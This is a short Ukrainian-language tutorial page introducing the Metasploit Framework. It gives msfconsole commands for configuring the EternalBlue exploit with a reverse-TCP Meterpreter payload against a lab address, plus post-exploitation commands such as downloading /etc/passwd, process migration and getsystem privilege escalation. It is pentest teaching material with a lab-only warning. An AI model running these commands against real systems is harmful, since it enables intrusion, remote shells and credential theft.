📖
Metasploit Framework
Найпотужніший фреймворк для exploits: структура, основні команди, payloads.
Metasploit Framework
Metasploit — найпопулярніший фреймворк для exploit розробки та пентесту. Розробник: Rapid7.
Компоненти:
- Modules — exploits, payloads, auxiliary, post, encoders
- msfconsole — основний інтерфейс
- msfvenom — генератор payloads
- Meterpreter — просунута payload-сесія
Основні команди msfconsole
bash
# Запуск
msfconsole
# Пошук модулів
search type:exploit platform:windows smb
search eternalblue
search cve:2021-44228
# Вибір і налаштування модуля
use exploit/windows/smb/ms17_010_eternalblue
info # інформація про модуль
show options # параметри
set RHOSTS 192.168.56.101
set LHOST 192.168.56.100
set LPORT 4444
set PAYLOAD windows/x64/meterpreter/reverse_tcp
# Запуск
check # перевірити чи ціль вразлива
run # або exploitMeterpreter — просунута сесія
Meterpreter — payload що живе в пам'яті, не записується на диск.
bash
# Після успішного exploit — в Meterpreter:
sysinfo # інформація про систему
getuid # поточний користувач
ps # список процесів
migrate <PID> # перемістити в інший процес
# Файлова система
ls
download /etc/passwd /tmp/
upload /tmp/tool.exe C:\Windows\Temp\
# Підвищення привілеїв
getsystem # автоматична спроба
use post/multi/recon/local_exploit_suggester
# Сесії
background # перемістити в background
sessions -l # список сесій
sessions -i 1 # відновити сесію 1
EternalBlue (MS17-010, CVE-2017-0144) — один з найвідоміших exploits. WannaCry та NotPetya використовували його для глобальних кібератак. Тестування цього exploit дозволяється виключно у власній ізольованій лабораторії.